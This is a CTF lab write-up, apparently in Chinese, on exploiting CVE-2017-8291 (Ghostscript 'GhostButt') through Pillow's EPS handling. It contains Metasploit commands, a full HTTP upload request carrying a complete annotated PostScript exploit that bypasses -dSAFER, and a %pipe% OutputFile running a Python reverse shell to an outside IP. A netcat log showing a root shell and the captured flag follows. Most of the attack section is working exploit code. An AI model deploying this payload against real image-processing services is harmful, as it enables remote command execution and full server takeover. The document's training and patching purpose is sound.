CVE-2017-8291
信息
靶标介绍:
Python 图像处理库 PIL(Pillow) 在打开以 `%!PS` 开头的 EPS/PS 文件时会调用系统中的 GhostScript 进行渲染,因此会受到 GhostScript 的 GhostButt 类型混淆漏洞(CVE-2017-8291)影响:精心构造的 EPS 文件可以绕过 `-dSAFER`,并通过设置 `/OutputFile (%pipe%...)` 让 GhostScript 执行任意 shell 命令,最终造成远程命令执行。修复方式是把 GhostScript 升级到已修补的版本(9.22 及以后),或者不要让 Pillow 直接处理来自用户的 EPS/PS 输入。
- CVE
入口点
http://e0e73c50-7392-42b3-9b5d-fc22a78e8cf2-488.cyberstrikelab.com:83/
参考 neargle/PIL-RCE-By-GhostButt(Exploiting Python PIL Module Command Execution Vulnerability)按其步骤复现即可。
或者直接借助 Metasploit
msf > use exploit/unix/fileformat/ghostscript_type_confusion
[*] No payload configured, defaulting to cmd/unix/php/meterpreter/reverse_tcp
msf exploit(unix/fileformat/ghostscript_type_confusion) > set lhost 8.***.***.180
lhost => 8.***.***.180
msf exploit(unix/fileformat/ghostscript_type_confusion) > set lport 10001
lport => 10001
msf exploit(unix/fileformat/ghostscript_type_confusion) > run
[+] msf.eps stored at /home/randark/.msf4/local/msf.eps
把生成的 EPS 作为"图片"通过站点的上传接口提交即可。注意:Pillow 是按文件头(`%!PS`)识别格式的,所以文件名写 `1.png`、Content-Type 写 `image/png` 都不影响触发;从下面请求体里的 `python3 -c` 反弹 shell 命令来看,这里实际上传的是 neargle PoC 中的 EPS,而不是上面 msf 生成的 msf.eps(那个默认对应 php meterpreter,需要配合 `exploit/multi/handler` 接收)。修改 payload(例如反弹 IP/端口)之后要同步重算 Content-Length,或者交给 Burp 等工具自动处理。
POST / HTTP/1.1
Host: e0e73c50-7392-42b3-9b5d-fc22a78e8cf2-488.cyberstrikelab.com:83
Content-Length: 2336
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://e0e73c50-7392-42b3-9b5d-fc22a78e8cf2-488.cyberstrikelab.com:83
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLkzYRNbx2tfqscN7
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://e0e73c50-7392-42b3-9b5d-fc22a78e8cf2-488.cyberstrikelab.com:83/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryLkzYRNbx2tfqscN7
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
% Exploit for CVE-2017-8291 ("GhostButt", Ghostscript type confusion).
% Delivered to Pillow as an "image": Pillow recognises the %!PS header and
% hands the file to Ghostscript, which interprets the PostScript below. The
% final step sets /OutputFile to a %pipe% target, which Ghostscript opens by
% running the given command in a shell (here: a reverse shell to LHOST:LPORT).
% NOTE(review): the byte values and offsets used below are heap-layout
% dependent; they target a specific Ghostscript build and are not portable.
/size_from 10000 def        % smallest string buffer to allocate (bytes)
/size_step 500 def          % step between buffer sizes
/size_to 65000 def          % largest buffer size
/enlarge 1000 def           % number of null slots pushed by 'array aload' below
%/bigarr 65000 array def
% Count the iterations from size_from to size_to -> buffercount.
0
size_from size_step size_to {
pop
1 add
} for
/buffercount exch def
% buffersizes[i] = i-th size of that sequence.
/buffersizes buffercount array def
0
size_from size_step size_to {
buffersizes exch 2 index exch put
1 add
} for
pop
% Allocate one string per size and set its last 16 bytes to 0xff; the search
% loop below watches those marker bytes for a change.
/buffers buffercount array def
0 1 buffercount 1 sub {
/ind exch def
buffersizes ind get /cursize exch def
cursize string /curbuf exch def
buffers ind curbuf put
cursize 16 sub 1 cursize 1 sub {
curbuf exch 255 put
} for
} for
% buffersearchvars: [0]=number of .eqproc calls so far, [1]=scan index,
% [2]=found flag, [3]=buffer whose marker changed, [4]=offset (size-16) in it.
/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def            % will hold currentdevice once the heap is corrupted
enlarge array aload         % push 'enlarge' nulls onto the operand stack (heap/stack massage)
{
.eqproc                     % undocumented internal operator; the type confusion it triggers is what this exploit relies on
buffersearchvars 0 buffersearchvars 0 get 1 add put
buffersearchvars 1 0 put
buffersearchvars 2 0 put
buffercount {
buffers buffersearchvars 1 get get
buffersizes buffersearchvars 1 get get
16 sub get
254 le {                    % marker byte is no longer 0xff: this buffer was overwritten
buffersearchvars 2 1 put
buffersearchvars 3 buffers buffersearchvars 1 get get put
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
} if
buffersearchvars 1 buffersearchvars 1 get 1 add put
} repeat
buffersearchvars 2 get 1 ge {
exit                        % stop as soon as an overwritten buffer has been found
} if
%(.) print
} loop
.eqproc
.eqproc
.eqproc
% Patch three bytes inside the found buffer, then store currentdevice in
% sdevice[0]. NOTE(review): presumably rewrites the header of an object that
% overlaps the buffer so the device object becomes writable below; the exact
% byte values are build-specific - confirm against the targeted gs version.
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put
buffersearchvars 0 get array aload
% Zero three slots of the device object at fixed offsets. NOTE(review):
% presumably the device's safety-related parameters (the -dSAFER lock);
% offsets are build-specific.
sdevice 0 get
16#3e8 0 put
sdevice 0 get
16#3b0 0 put
sdevice 0 get
16#3f0 0 put
% Set OutputFile to a %pipe% target: Ghostscript opens it by running the
% command in a shell. Replace the IP/port with your own listener before use.
currentdevice null false mark /OutputFile (%pipe%python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.***.***.180",10001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")')
.putdeviceparams
1 true .outputpage          % presumably forces a page output, which opens OutputFile (i.e. runs the pipe command)
.rsdparams                  % internal operator named in the CVE-2017-8291 description
%{ } loop
0 0 .quit
%asdf
------WebKitFormBoundaryLkzYRNbx2tfqscN7--
成功收到反弹 shell,并且 `whoami` 返回 root:处理上传图片的服务本身就是以 root 运行的,这属于值得在报告里单独指出的额外问题(该服务应以低权限用户运行,以缩小此类解析器漏洞的影响范围)。
root@jmt-projekt:~# nc -lvnp 10001
Listening on 0.0.0.0 10001
Connection received on 211.137.105.42 13668
# whoami
whoami
root
# cat /tmp/flag.txt
cat /tmp/flag.txt
go-flag{7b169dee-8836-482d-ba12-0611b5d8cef7}